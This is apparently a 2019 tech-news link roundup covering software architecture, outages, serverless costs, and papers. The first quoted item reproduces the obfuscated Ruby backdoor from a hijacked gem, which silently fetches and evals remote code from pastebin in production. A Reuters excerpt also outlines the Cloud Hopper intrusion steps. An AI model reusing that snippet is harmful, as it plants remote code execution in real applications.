<li><a href="https://withatwist.dev/strong-password-rubygem-hijacked.html">Tute Costa</a>: def _!;begin;yield;rescue Exception;end;end_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if Rails.env[0]=="p"}</li>
<li><a href="https://www.nytimes.com/2019/07/09/books/review/the-code-margaret-omara.html?smid=nytcore-ios-share">Stephen Mihm</a>: O&rsquo;Mara argues persuasively that Fairchild &ldquo;established a blueprint that thousands followed in the decades to come: Find outside investors willing to put in capital, give employees stock ownership, disrupt existing markets and create new ones.&rdquo; But she makes clear that this formula wasn&rsquo;t just a matter of free markets working their magic; it took a whole lot of Defense Department dollars to transform the region. Conveniently, the Soviets launched Sputnik three days after Fairchild was incorporated, inaugurating a torrent of money into the tech sector that only increased with the space race. </li>
<li><a href="https://medium.com/otherlab-news/the-case-for-ambitious-energy-r-d-in-the-u-s-e4351406d0ee">Saul Griffith</a>: Without a doubt, there is at least ten-fold the good ideas in the minds of our young people that are currently being underfunded. And you want to get the money as directly as possible to the 25-year-olds, not their professors.</li>
<li><a href="http://www.platformonomics.com/2019/07/a-very-cold-take-on-ibm-red-hat-and-their-hybrid-cloud-hyperbole/">Charles Fitzgerald</a>: But the biggest problem for IBM and Red Hat&rsquo;s hybrid cloud software ambitions is not Cloud Foundry and Docker, but cloud hyperpowers AWS, Azure and GCP. Containers are fun and irresistible in the Lego-like metaphors they evoke, but they provide no higher-level services, and many will argue are just a brief layover on the way to serverless computing as the native programming model for the cloud.&nbsp;</li>
<li><a href="https://news.ycombinator.com/item?id=20428041">Terretta</a>: On the contrary, I developed early merchant and payment gateway tech, and they absolutely do [fail open]. The scenario you describe is extraordinarily rare, which allows an arbitrage between CAP perfection and customer satisfaction. On a separate note, at any given time, some parts of our national payments ecosystem are &ldquo;down&rdquo;. There are enough players involved you have an appearance of resilience. You can see this in a mall, when one store&rsquo;s card swipe terminals are down, and another&rsquo;s are not, and almost never happens that all the stores are down at the same time. You can think of all these other players as an incidental circuit breaker pattern upstream of Visa. VisaNet itself is surprisingly unscaled, capable of only about 24,000 transactions per second. Twenty years ago, our gateway would hit 15,000 transactions per second real world use. To do that, we scattered/gathered across many independent paths into card networks and various merchant banks.&nbsp;</li>
<li><a href="https://news.ycombinator.com/item?id=20424131">dps</a>: (Stripe CTO here) &nbsp;We wrote this RCA to help our users understand what had happened and to help inform their own response efforts. Because a large absolute number of requests with stateful consequences (including e.g. moving money IRL) succeeded during the event, we wanted to avoid customers believing that retrying all requests would be necessarily safe. For example, users (if they don&rsquo;t use idempotency keys in our API) who simply decided to re-charge all orders in their database during the event might inadvertently double charge some of their customers. We hear you on the transparency point, though, and will likely describe events of similar magnitude as an "outage" in the future - thank you for the feedback.</li>
<li><a href="https://www.reddit.com/r/aws/comments/c7rygt/finally_finished_a_65tb_database_s3_i_can_sleep/et089p8/">thejumpingtoad</a>:&nbsp;Can confirm, AWS Glue is the tool of choice. We're offloading mainframe data into S3 bit by bit for a major financial institution.</li>
<li><a href="https://www.nasa.gov/feature/ames/tunguska-revisited-111-year-old-mystery-impact-inspires-new-more-optimistic-asteroid">NASA</a>: The good news is that these simulations, combined with recent asteroid population data, suggest that city destroying Tunguska-level events occur with a frequency on the order of millennia, not centuries, as was previously thought. Chelyabinsk-level events occur roughly every 50 years, though.</li>
<li><a href="https://www.reddit.com/r/aws/comments/c7rygt/finally_finished_a_65tb_database_s3_i_can_sleep/esnvzeb/">jonathantn</a>:&nbsp;I'd recommend setting the S3 bucket to intelligent tiering. Let S3 figure out which of the 6.5TB of data is "hot" and then it will automatically tier down the colder data and save you a bunch of money on your S3 bill. It takes 30 days for S3 to observe the access patter and start tiering the objects. Also for safety make sure you have versioning turned on for the bucket. I recommend that once something is deleted let it go to Glacier Deep Archive for six months before it's finally purged. You can accomplish that with your Life Cycle policy.&nbsp;</li>
<li><a href="https://www.reuters.com/investigates/special-report/china-cyber-cloudhopper/">reuters</a>: Teams of hackers connected to the Chinese Ministry of State security broke into the systems of eight major information technology service providers, Reuters has found, in a global cyber-espionage campaign known as &ldquo;Cloud Hopper.&rdquo; By hacking the technology service providers, the attackers were able to &ldquo;hop&rdquo; into client networks and steal reams of corporate and government secrets in what U.S. prosecutors say was an effort to boost Chinese economic interests. Infiltrate the service provider, usually via a so-called &ldquo;spear phishing&rdquo; email designed to trick employees into downloading malware or giving away their passwords.&nbsp;Once inside, map out the environment, establish footholds and find the target: the system administrator who controls the company &lsquo;jump servers&rsquo; which act as a bridge to client networks.&nbsp;After passing through the &ldquo;jump server,&rdquo; map out the victim network and identify commercially sensitive data.&nbsp;Encrypt and exfiltrate the data, either directly from the client victim or back through the service provider.</li>
<li><a href="https://news.ycombinator.com/item?id=20249232">alfiedotwtf</a>: I worked on the floor with two teams. One (ours) built our apps and infrastructure the correct way. JIT. Get it working, get it working correct, get it working fast. And given the scale, it did wonders. The other team talked big and gave demos to higher ups and their higher ups and their higher ups. Web scale baby. And with that came the galactic infrastructure and all the buzzword needed in order to run it. About 6 months later, they quit. They had spent their whole budget on astronaut architecture, that the didn't have any money or time left to build the apps that were supposed to run on said infrastructure."You are not FANG".</li>
</ul>
<h2>Useful Stuff:</h2>
<ul>
<li><a href="https://stackshare.io/stack-history-timeline-slack-tech-stack-evolution">Stack History: A Timeline of Slack's Tech Stack Evolution</a>. A very cool presentation. It really gives you a way to look at changes over time. If you want to just jump to the current end state go <a href="https://stackshare.io/stack-history-timeline-slack-tech-stack-evolution">here</a>. Slack started in 2013 as a LAMP stack on AWS. They moved more into AWS over time.&nbsp;In 2018, Slack signed an agreement with AWS to spend at least $50 million a year over five years, for a total of at least $250 million.&nbsp;As of 2017, Slack was handling a peak of 1.4 billion jobs a day, (33,000 jobs every second). The moved from Redis to Kafka for their job queue.&nbsp;Solr <a href="https://www.youtube.com/watch?v=EQ336PTZfhU">powers search</a> at Slack.&nbsp;Web: a mix of JavaScript/ES6 and React.&nbsp;Desktop: And Electron to ship it as a desktop application.&nbsp;The core application and the API written in PHP/Hack that runs on HHVM.&nbsp;The data is stored in MySQL using Vitess. Caching is done using Memcached and MCRouter.&nbsp;The messaging system uses WebSockets with many services in Java and Go.&nbsp;Load balancing is done using HAproxy with Consul for configuration.Most services talk to each other over gRPC.&nbsp;Voice and video calling service was built in Elixir. Data warehouse is built using open source tools including Presto, Spark, Airflow, Hadoop and Kafka.</li>
<br />
<li>Systems @Scale 2019 videos are <a href="https://atscaleconference.com/videos-articles/">now available</a>.&nbsp;<a href="https://code.fb.com/data-center-engineering/delos/">Delos: Simple, flexible storage for the Facebook control plane</a>:&nbsp;a fundamentally new architecture for building replicated storage systems. Its modular, layered design provides flexibility and simplicity without sacrificing performance or reliability.&nbsp;</li>
<br />
<li><em>API Gateway is likely going to be the first to go, followed by slimming down of data written to DynamoDB. Managing our own EC2s does not seem to save too much compared to Lambdas, based on early data.</em> Hypertrack on&nbsp;<a href="https://www.hypertrack.com/blog/2019/07/11/how-we-built-a-serverless-architecture-with-aws/">How we built a serverless architecture with AWS</a>.&nbsp;                                                                                                                
<ul>
<li>The problem with serverless architectures is they all look the same. You have boxes with names like lambda, GraphQL, DynamoDB, etc all pointing at each other. But how does it work in practice "when all hell breaks loose" and requests to one of your APIs "peaked at around 10k requests/second?"&nbsp;</li>
<li>The good news:&nbsp;API latencies, uptime, and real-time performance were normal. The serverless architecture had scaled up automagically to handle the traffic that was 2-3 orders of magnitude higher than the day before.&nbsp;</li>
<li>The bad news? It costs a lot.&nbsp;</li>
<li>They now run hundreds of Lambda functions, store data in almost as many DynamoDB tables and leverage dozens of other Amazon services to make our platform work across our environments.&nbsp;</li>
<li>The complexity of managing the high number of resources and wiring them up with each other is only manageable through strong automation. And defining all the infrastructure-as-code is critical to achieving that automation.&nbsp;</li>
<li>They moved to Serverless framework for non-shared infrastructure parts.&nbsp;&nbsp;</li>
<li>CircleCI is used to build, test and deploy continuously.&nbsp;</li>
<li>They know unit costs by component, and that provides an input to the product, design and architecture thinking. The actual picture gets clearer with more usage, and key is to keep an eye on it. For all practical purposes, cost serves as a system level test/monitoring.</li>
</ul>
</li>
<br />
<li>You may not agree with everything but the reasoning should prove instructive. My biggest lesson, at least on Thursdays, is <em>software is a team sport</em>. What's yours?&nbsp;<a href="https://blog.juliobiason.net/thoughts/things-i-learnt-the-hard-way/">Things I Learnt The Hard Way (in 30 Years of Software Development)</a>:&nbsp;Spec first, then code;&nbsp;Write steps as comments;&nbsp;Gherkin (test description format) is your friend to understand expectations; Unit tests are good, integration tests are gooder;&nbsp;Tests make better APIs;&nbsp;Be ready to throw your code away;&nbsp;Solve the problem you have right now;&nbsp;Documentation is a love letter to your future self;&nbsp;The function documentation is its contract;&nbsp;If a function description includes an "and", it's wrong;&nbsp;Types say what you data is;&nbsp;If your data has a schema, use a structure to keep it;&nbsp;"Right tool for the job" is just to push an agenda;&nbsp;Data flows beat patterns, and many more. Good discussion<a href="https://news.ycombinator.com/item?id=20211778"> on HackerNews</a>.</li>
<br />
<li><em>I like to think of the effort to operate a distributed system being similar to operating a large organization, like a hospital.</em>&nbsp;Practices found useful at Uber to<a href="https://blog.pragmaticengineer.com/operating-a-high-scale-distributed-system/"> reliably operate a large system</a>: Monitoring; Oncall, Anomaly Detection &amp; Alerting; Outages &amp; Incident Management Processes; Postmortems, Incident Reviews &amp; a Culture of Ongoing Improvements; Failover Drills, Capacity Planning &amp; Blackbox Testing; SLOs, SLAs &amp; Reporting on Them; SRE as an Independent Team; Reliability as an Ongoing Investment; Further Recommended Reading. Mitigation now, investigation tomorrow. The most common failure scenario I have observed is services not having enough resources in a new data center to handle global traffic. When a company grows to reliability work across teams takes up more than a few engineers' time, it's time to put a dedicated team for this in place.&nbsp;</li>
<br />
<li>Advice from Amazon, UPS, and Home Depot on&nbsp;<a href="https://www.linkedin.com/pulse/how-prevent-prime-day-crash-red-hat-still-what-got-programmers-bean">How to prevent a Prime Day crash</a>. Prepare for double or triple that number. Begin preparations months in advance. Making sure your system is as dynamically scalable as possible. Be strategically multi-regional, divvy up the onslaught of traffic by where in the country/world it&rsquo;s coming from. Lock down our applications ahead of peak month to avoid any last-minute changes causing problems. Stress test. Levarage traffic data from past years to predict future results.&nbsp;</li>
<br />
<li>Videos from React Europe are <a href="https://www.youtube.com/channel/UCorlLn2oZfgOJ-FUcF2eZ1A">now available</a>.&nbsp;</li>
<br />
<li>Since a regular expression processor is basically an embedded interpreter and interpreters in embedded systems are very dangerous because of their lack of predictability, REs should probably not be used in production. A pattern you didn't test could blow up at any time. <a href="https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/">Details of the Cloudflare outage on July 2, 2019</a>:&nbsp;Unfortunately, last Tuesday&rsquo;s update contained a regular expression that backtracked enormously and exhausted CPU used for HTTP/HTTPS serving. This brought down Cloudflare&rsquo;s core proxying, CDN and WAF functionality.&nbsp;</li>
<br />
<li>If you are a small government in Florida this won't help. <a href="https://gctc.opencommons.org/images/f/ff/CommunityCloudPrivacy.pdf">Secure Cloud Architecture - Towards a Smart City cloud privacy, Security, and Rights-Inclusive Architecture</a>. Start with a 3 level classification scheme: Red sensitive data including personally identifiable information; so most controlled and restricted; Yellow medium sensitivity information whose access may be controlled but by law can be shared more widely; although still with controls and monitoring;&nbsp;Green low sensitivity data which can be shared openly &ndash; smart city civic and open data. After that, not much of practical use.</li>
<br />
<li>Python, Java, and Javascript as the top three most in-demand languages says <a href="https://www.codingdojo.com/blog/unicorn-languages-report">Coding Dojo</a>. My decision to go with Perl over Python all those years ago is not aging well. Of course ReactJS is the top framework. MySQL and Redis tie for the top database. So while it seems everything is changing it appears not that much has changed.</li>
<br />
<li>Videos from&nbsp;Gophercon SG 2019 are <a href="https://www.youtube.com/playlist?list=PLq2Nv-Sh8EbYBYteOWx9rNuy0JSF8mzsu">now available</a>.&nbsp;</li>
<br />
<li>Microsoft Security Response Centre <a href="https://msrc-blog.microsoft.com/2019/07/16/a-proactive-approach-to-more-secure-code/">is saying</a> they are considering replacing C and C++ with Rust. The idea is to stop piling tooling on top of insecure languages and just use a secure language to start with. We will see.&nbsp;</li>
<br />
<li><em>The combination of deployless and feature flags means that about 60% of the deployment pipeline is no longer necessary.</em>&nbsp;<a href="https://medium.com/darklang/how-dark-deploys-code-in-50ms-771c6dd60671">How Dark deploys code in 50ms</a>.                                                                                          
<ul>
<li>The first and most important decision was to make Dark &ldquo;deployless&rdquo; (thanks to Jessie Frazelle for coining the term). Deployless means that anything you type is instantly deployed and immediately usable in production.&nbsp;</li>
<li>Dark runs interpreters in the cloud. When you write new code in a function or HTTP/event handler, we send a diff of the Abstract Syntax Tree (the representation of your code that our editor and servers use under the hood) to our servers, and then we run that code when requests come in. So deployment is just a small write to a database, which is instant and atomic.&nbsp;</li>
<li>Our deploys are so fast because we trimmed a deploy to the smallest thing possible.&nbsp;One way to reduce accidental complexity in Dark is by solving many different problems with a single solution. Feature flags is our workhorse: replacing local dev environments, git branches, code deployment, and of course still providing the traditional use-case of slow, controlled roll-out of new code.&nbsp;</li>
<li><a href="https://news.ycombinator.com/item?id=20413428">pbigger</a>:&nbsp;The model is quite different to how people write code today. Instead of a process that takes code from your machine and sends it to prod (and thus has a lot of risk), you code in a sorta sandbox _in prod_. That is then enabled for users via changing the feature flag setting</li>
<li><a href="https://news.ycombinator.com/item?id=20395280">pbigger</a>: We run the infrastructure in the cloud (we run it on GCP using Postgres and k8s, but will likely go multicloud at some point). Most of the advantages we discuss in this post come from the fact that you're using the Dark editor, language and infra. I don't believe this would be possible with a self-hosted solution.</li>
</ul>
</li>
<br />
<li>This is why we can't maintain nice things.&nbsp;<a href="https://thenewstack.io/openfaas-creator-on-open-sources-community-funding-model/">OpenFaaS Creator on Open Source&rsquo;s Community-Funding Model</a>. Is the reason companies won't pay the maintainers of the open source software they use and profit from because they see it as charity? Whatever the reason corporate support for open source has proven to be a failed model.&nbsp;</li>
<br />
<li>You probably don't have enough fault isolation. Stripe's <a href="https://stripe.com/rcas/2019-07-10">Root cause analysis: significantly elevated error rates on 2019‑07‑10</a>: we implemented additional monitoring to alert us when nodes stop reporting replication lag; We are also introducing several changes to prevent failures of individual shards from cascading across large fractions of API traffic. This includes additional circuit-breaking on failed operations to particular clusters, including the one implicated in these events. We will also pursue additional fault isolation techniques to contain the impact of a single failed shard and limit resource consumption by clients attempting repeated retries of failed requests; we will introduce further procedures and tooling to increase the safety with which operators can make rapid configuration changes during incident response.</li>
<br />
<li>Are you checking your certificates are expiring? <a href="https://hacks.mozilla.org/2019/05/technical-details-on-the-recent-firefox-add-on-outage/">Technical Details on the Recent Firefox Add-on Outage.</a></li>
<br />
<li>The usual page after page detailing why OOP sucks and the equally usual paragraph saying functional programming is the answer without any proof but the toe curling idealism of the converted.&nbsp;<a href="https://medium.com/better-programming/object-oriented-programming-the-trillion-dollar-disaster-%EF%B8%8F-92a4b666c7c7">Object-Oriented Programming &mdash; The Trillion Dollar Disaster</a>. Yes, OOP has been used poorly. But it has been used. Why might that be? Are programmers so irrational and full of self-hatred that they would maintain a multi-decade long conspiracy against FP? That must be it.&nbsp;</li>
<br />
<li>Newton missed data gravity, but it's a real force. If you are considering moving a lot of data to the cloud then don't miss this experience report.&nbsp;<a href="https://blog.misaunders.com/2019/migrating-6-5tb-of-filestream-data-to-s3-a-journey-concluded/">Migrating 6.5TB of FileStream Data to AWS S3 - A Journey Concluded</a>. It's quite the heroic tale.&nbsp;                                                                                            
<ul>
<li>A lesson is to create a service interface from the beginning so data is written through one API. That would have made finding all write paths into the database much easier.</li>
<li>Versioining is also on. It was one of the biggest draw-cards to using S3 versus any other service, was the ability to know that user based actions like delete or overwrite could have protection against.</li>
<li>Main savings were cost and reliability. Yes, S3 can do go, we know that. But there was always a FAR greater chance this server we ran would go down, far higher than S3 going down. It had had 6+ outages in the 6 months during this cutover alone! :)</li>
</ul>
</li>
<br />
<li>It has been said most recent mobile services are about replacing all the jobs a mom typically performed. I wonder what this means? &nbsp;<a href="https://hackernoon.com/the-ideal-toolstack-to-sustain-your-growth-by-timote-geimer-bb7983e2b6d3">The Ideal Startup Toolstack to Scale Your Growth</a>: Slack, Intercom, Chargebee, HubSpot, Zendesk, ProductBoard, Gitlab, Elium, Zoom, Zapier, Google Suite, Stripe, Chartmogul, Spendesk, Apollo, Wisepop, Pixelme, Squarespace, Lempod, Quuu,&nbsp;Smartrecruiters,&nbsp;Bamboo HR,&nbsp;CRM HubSpot, Intercom,&nbsp;Planhat,&nbsp;Mixpanel, Marvel, Sketch. </li>
<br />
<li><a href="http://antirez.com/news/130">Client side caching in Redis 6</a>.&nbsp;&nbsp;Client libraries are usually fairly dumb, but they can do a lot iff you are willing to move complexity into the client. Here's a clever approach Redis is adopting to create a caching layer in the client. Many clients have a lot of memory. Why not use it? For some irony&nbsp;<a href="https://drive.google.com/file/d/1UpYuZm3JIQM4HNqXPGkSgWlyHMto6erm/view">Fast key-value stores: An idea whose time has come and gone</a>&nbsp;argues for client side caching of data because it gets rid of marshaling overhead and network latency. They quote improvements of 99.9% latency by 40%. Though I seem to remember OO databases of the past faulting objects into memory&mdash;they didn't make it.</li>
<br />
<li><a href="https://thenewstack.io/learning-from-the-success-of-kubernetes/">Kubernetes Co-Founders On K8s&rsquo; Past, Present and Future (It Ain&rsquo;t All Pretty)</a>. Why did the engineering community evolve around k8s instead of docker? Is the utility being driven by vertical integration or driven by modularity? Since k8s is an intrinsically more modular system it allowed every vendor to see someway to create unique value. As a result k8s became a natural aggregation point for the community to rally around. Where because Docker was much more focussed on vertical integration and closed system experience it just wasn't that interesting to other vendors that wanted to bring resources.&nbsp;</li>
<br />
<li><em>You should tend to prefer mature things, and you should try not to use too many things.</em> &nbsp;<a href="http://boringtechnology.club/">Choose Boring Technology</a>: "Then one day I said, &ldquo;hey, I wonder how activity feeds is doing.&rdquo; And I looked at it and was surprised to discover that in the time since we&rsquo;d launched it, the usage had increased by a factor of 20. And as far as I could tell it was totally fine. The fact that 2,000% more people could be using activity feeds and we didn&rsquo;t even have any idea that it was happening is certainly the greatest purely technical achievement of my career.&nbsp;The reason it was possible was because we used the shared stack. There were people around whose job involved noticing that we needed more MySQL&rsquo;s or cron boxes or whatever. And there were other people who had to go to the datacenter and plug in new machines. But they were doing that horizontal scaling because the site was growing holistically. Nobody doing this had any awareness of our lone feature." Of course what is boring is a moving target. My guess if you want a technology bad enough you can make a reasonable argument as to why it's boring.</li>
<br />
<li>Really all objects are algorithms and all algorithms are objects. Two sides of the same coin.&nbsp;<a href="https://gieseanw.wordpress.com/2019/05/10/algorithms-as-objects/">Algorithms as objects</a>.&nbsp;</li>
<br />
<li><em>Wouldn't it be wonderful if the tools we use to build the web were as accessible as spreadsheets are</em>.&nbsp;<a href="https://www.youtube.com/watch?v=AdNJ3fydeao">Rich Harris - Rethinking reactivity</a>. Brilliant. Never thought of spreadsheets as reactive programs. What matters is the functionality, not where the functionality happens. The only reliable way improve performance is to get rid of code.</li>
<br />
<li><a href="https://player.fm/series/revisionist-history-2301148/the-tortoise-and-the-hare">The Tortoise and the Hare</a>.&nbsp;The LSAT reminds me of software interviews and the lack of relationship between schools, grades, and interview performance to success at the job. For some reason we'd rather haze people instead of train people.</li>
<br />
<li>Checklists have been part of <a href="http://www.possibility.com/wiki/index.php?title=CodeReviews">code reviews</a> for 30 years.&nbsp;<a href="https://blog.nuclino.com/the-simple-genius-of-checklists-from-b-17-to-the-apollo-missions">The Simple Genius of Checklists, from B-17 to the Apollo Missions</a>.&nbsp;<a href="https://news.ycombinator.com/item?id=20293715">euler_angles</a>:&nbsp;I have been a flight test and rocket test engineer. Checklists were life, especially in the rocket world. The fantastic thing about checklists is that they both keep you accountable and free your mental resources so that when something happens that one of your checklists don't cover, you know you've at least tried all the sane/expected things. I personally found that backstop freeing and allowed me to use my creativity when it was demanded by things going wrong.</li>
<br />
<li>Everything old is new again.&nbsp;<a href="https://livefreeordichotomize.com/2019/06/04/using_awk_and_r_to_parse_25tb/">Using AWK and R to parse 25tb</a>. <a href="https://news.ycombinator.com/item?id=20294477">scottlocklin</a>:&nbsp;You can solve many, perhaps most terascale problems on a standard computer with big enough hard drives using the old memory efficient tools like sed, awk, tr, od, cut, sort &amp; etc. A9's recommendation engine used to be a pile of shell scripts on log files that ran on someone's desktop...</li>
<br />
<li><a href="http://thume.ca/2019/04/29/comparing-compilers-in-rust-haskell-c-and-python/">Comparing the Same Project in Rust, Haskell, C++, Python, Scala and OCaml</a>: I think my overall takeaway is that design decisions make a much larger difference than the language, but the language matters insofar as it gives you the tools to implement different designs.</li>
<br />
<li>Did you know there's an entire conference on GraphQL?&nbsp;<a href="https://time2hack.com/2019/06/graphql-conf-2019-in-a-nutshell-some-takeaways/">GraphQL Conf 2019 in a nutshell - Some Takeaways</a>. Serveral videos are available.&nbsp;</li>
<br />
<li><em>Jonathan Sumption argues against Britain adopting a written constitution as a response to political alienation.</em>&nbsp;<a href="https://podcasts.apple.com/us/podcast/the-reith-lectures/id318705261?i=1000441903543">5/5. Shifting the Foundations</a>. A thought provoking series of podcasts. In computing we tend to like systems based on a system of laws. We love security based constraint solvers because we can prove a system secure. These lectures make the case that judges and the legal system is not the place for making policy, that's the realm of a political process where we debates issues and make decisions. The big problem is in the US our democracy relies upon the political process to counter partisanship, which sounds good in theory&mdash;people working out their problems together; in practice the political process algorithm has not proved a sufficient immune system to sustain a democracy against the constant stream of forces subverting it for their own ends. In response in the US we&rsquo;ve tried giving more power to the legal system in the hopes it might be enough to save democracy, but that strategy is essentially conservative. It&rsquo;s not adaptive. A legalistic system can not rise to meet the problems of the present or the challenges of the future. I think this is relevant in the future because of AI. AI will no doubt play a larger governing role in our future. The problem is any AI mediated system will certainly be legalistic. That may not be what we want, but that may be what we deserve.</li>
<br />
<li>It's not on-prem. It's not IaaS. It's something new.&nbsp;<a href="https://www.youtube.com/watch?v=Q6OgRawyjIQ">What is an AWS Outpost Rack?</a>&nbsp;This is what you'll see inside an AWS datacenter and is the product of 12 years of development. It's 24" wide, 48" deep, and 80" tall. It has casters so it can be rolled into position. You plug in power and networking and automation takes over. There's a bus bar in the back and power shelf in the middle. Every server does not have a power supply. The outpost rack uses a centralized redundant power conversion unit and DC distribution unit in the backplane. Dual switches are included. Every active component is redundant and can be pulled and replaced without interrupting service. You'll be notified of any detected failure and how to replace a unit. Bringing new capacity online is completely automated. Switches are 100 gig capable supporting 4 100 gig connections. You can use 10 gig optics. Racks can be linked together. Nitro cards are in every server. The only difference between this rack and one used in EC2 is that it includes an additional Nitro chip in every server to connect it back to the public region. Outpost brings AWS to wherever you need it.&nbsp;</li>
<br />
<li><a href="https://instagram-engineering.com/video-upload-latency-improvements-at-instagram-bcf4b4c5520a">Video Upload Latency Improvements at Instagram</a>:&nbsp;A simple improvement to reduce video upload latency is to only do the minimal work necessary before a video is considered publishable;&nbsp;We represent our video data model with a graph-based storage system. All video versions are attached to a &ldquo;video asset&rdquo; parent node, which allows us to reason about the video at the uploaded media level instead of the video version level. This abstraction enables simple and unified publishing logic;&nbsp;We represent our video data model with a graph-based storage system. All video versions are attached to a &ldquo;video asset&rdquo; parent node, which allows us to reason about the video at the uploaded media level instead of the video version level. This abstraction enables simple and unified publishing logic;&nbsp;Another performance optimization we use to improve the upload latency and save CPU utilization is something we call a &ldquo;passthrough&rdquo; upload. In some cases, the media that is uploaded is already ready for playback on most devices. If so, we can skip the video processing altogether and store the video directly into our data model.</li>
<br />
<li>You are not alone.&nbsp;<a href="https://k8s.af/">Kubernetes Failure Stories</a>.&nbsp;</li>
<br />
<li><a href="https://omegataupodcast.net/309-forensic-engineering/">309 &ndash; Forensic Engineering</a>. This big difference in building structures is there are standards, requirements, materials, and standard load calculations, an understanding of forces, and doubling rules for safety factors, understanding of failure modes. Most software is is still made out of custom everything. Perhaps as the cloud services become more standard software can become a little more like structure engineering.</li>
<br />
<li><a href="https://www.youtube.com/watch?v=EQ336PTZfhU">Rebuilding Message Search at Slack</a>. Search is different at Slack. It's not like the web because every user has there own unique document set they have access to. It's not like email because there is a lot of commonality within teams. Messages quickly lose relevance over time. Not a lot of head queries, which means queries are unique so caching doesn't help a lot. 100x write to read ratio. Old system used Solr and assigned teams to fixed shards forever, so large teams could blow out a shard. Had to scale vertically and it cost a lot. Performance wasn't great. Changing the index would require feeding the entire message flow which would take months. The new system uses SolrCloud because that was the easiest migration and didn't see a big win with any other system. Built an offline indexing map-reduce like pipeline using snapshots from the MySQL database. Backups of MySQL are copied to S3 and the map-reduce pipeline is kicked off which produces Solr shards which are uploaded into the system. This is done every week.&nbsp;</li>
<br />
<li><a href="https://blog.discordapp.com/using-rust-to-scale-elixir-for-11-million-concurrent-users-c6f19fc029d3">Using Rust to Scale Elixir for 11 Million Concurrent Users</a>. While using a safe language like Elixir has advantages, it makes doing some simple things difficult&mdash;like creating a large, heavily updated, in-memory list: "The double-edged sword of immutable data structures is that mutations are modeled by taking an existing data structure and an operation and creating a brand new data structure that is the result of applying that operation to the existing data structure." After many workarounds, they went with another safe language: "The Rust backed NIF provides massive performance benefits without trading off ease of use or memory. Since the library operations all clocked in well under the 1 millisecond threshold, we could just use the built-in Rustler guarantees and not need to worry about reductions or yielding. The SortedSet module looks to the caller to just be a vanilla Elixir module that performs crazy fast."</li>
<br />
<li>A thorough explanation of event sourcing.&nbsp;<a href="https://queue.acm.org/detail.cfm?id=3321612">Online Event Processing</a>. May the log be with you.&nbsp;</li>
<br />
<li>I had a most negative visceral reaction to reading this. Who doesn't love queues? But the discussion is a good one.&nbsp;<a href="https://twitter.com/rbranson/status/1131989746643742721">@rbranson</a>: "Queues are bad, but software developers love them. You'd think they would magically fix any overload or failure problem. But they don't, and bring with them a bunch of their own problems.&nbsp;First off, queues turn your system into a liar. Convert something to an async operation and your system will always return a success response. But there's no guarantee that the request will actually ever be processed successfully." Tim Bray wrote a response in <a href="https://www.tbray.org/ongoing/When/201x/2019/05/26/SQS">On SQS</a>: "While there are good queues, I agree with his sentiment. If you can build a straightforward monolithic app and never think about all this asynchronous crap, go for it! If your system is big enough that you need to refactor into microservices for sanity&rsquo;s sake, but you can get away with synchronous call chains, you definitely should." Good discussion <a href="https://news.ycombinator.com/item?id=20019874">on HackerNews</a>.</li>
<br />
<li><a href="https://www.youtube.com/playlist?list=PLhr1KZpdzukdeX8mQ2qO73bg6UKQHYsHb">This is My Architecture</a> has a lot of great videos from various companies.</li>
<br />
<li><a href="https://github.com/hasura/graphql-engine/blob/master/architecture/live-queries.md">Scaling to 1 million active GraphQL subscriptions (live queries)</a>: Implementing live-queries is painful. Once you have a database query that has all the authorization rules, it might be possible to incrementally compute the result of the query as events happen. But this is practically challenging to do at the web-service layer. For databases like Postgres, it is equivalent to the hard problem of keeping a materialized view up to date as underlying tables change. An alternative approach is to refetch all the data for a particular query (with the appropriate authorization rules for the specific client). This is the approach we currently take. Secondly, building a webserver to handle websockets in a scalable way is also sometimes a little hairy, but certain frameworks and languages do make the concurrent programming required a little more tractable...After these experiments, we&rsquo;ve currently fallen back to interval based polling to refetch queries. So instead of refetching when there is an appropriate event, we refetch the query based on a time interval.&nbsp;</li>
</ul>
<h2>Soft Stuff:</h2>
<ul>
<li><a href="https://github.com/andygrove/ballista">andygrove/ballista</a>: Ballista is a proof-of-concept distributed compute platform based on Kubernetes and the Rust implementation of Apache Arrow.</li>
<li><a href="https://github.com/cuelang/cue">cuelang/cue</a>:&nbsp;CUE is an open source data constraint language which aims to simplify tasks involving defining and using data. You can use CUE to define a detailed validation schema for your data (manually or automatically from data) reduce boilerplate in your data (manually or automatically from schema) extract a schema from code generate type definitions and validation code merge JSON in a principled way define and run declarative scripts.</li>
<li><a href="https://github.com/uber-research/plato-research-dialogue-system">uber-research/plato-research-dialogue-system</a>: The Plato Research Dialogue System is a flexible framework that can be used to create, train, and evaluate conversational AI agents in various environments. It supports interactions through speech, text, or dialogue acts and each conversational agent can interact with data, human users, or other conversational agents (in a multi-agent setting).&nbsp;</li>
</ul>
<h2>Pub Stuff:<span style="font-size: 12px;">&nbsp;</span></h2>
<ul>
<li><a href="https://arxiv.org/abs/1906.07535">Migrating to GraphQL: A Practical Assessment</a>:&nbsp;As our key result, we show that GraphQL can reduce the size of the JSON documents returned by REST APIs in 94% (in number of fields) and in 99% (in number of bytes), both median results.</li>
<li><a href="https://ai.google/research/pubs/pub48033">Nines are Not Enough: Meaningful Metrics for Clouds</a>:&nbsp;We also suggest that defining guarantees in terms of defense against threats, rather than guarantees for application-visible outcomes, can reduce the complexity of these problems. Overall, we offer a partial framework for thinking about Service Level Objectives (SLOs), and discuss some unsolved challenges.</li>
<li><a href="https://www.aclu.org/report/dawn-robot-surveillance">THE DAWN OF ROBOT SURVEILLANCE</a>:&nbsp;Today&rsquo;s capture-and-store video systems are starting to be augmented with active monitoring technology known variously as &ldquo;video analytics,&rdquo; &ldquo;intelligent video analytics,&rdquo; or &ldquo;video content analysis.&rdquo; The goal of this technology is to allow computers not just to record but also to understand the objects and actions that a camera is capturing. This can be used to alert the authorities when something or someone deemed &ldquo;suspicious&rdquo; is detected, or to collect detailed information about video subjects for security or marketing purposes.</li>
<li><a href="https://blog.acolyer.org/2019/06/17/towards-multiverse-databases/">Towards Multiverse Databases</a>:&nbsp;The central idea behind multiverse databases is to push the data access and privacy rules into the database itself. The database takes on responsibility for authorization and transformation, and the application retains responsibility only for authentication and correct delegation of the authenticated principal on a database call. Such a design rules out an entire class of application errors, protecting private data from accidentally leaking.</li>
<li>Google's AI papers&nbsp;<a href="https://ai.googleblog.com/2019/06/google-at-cvpr-2019.html">at CVPR 2019</a>.&nbsp;</li>
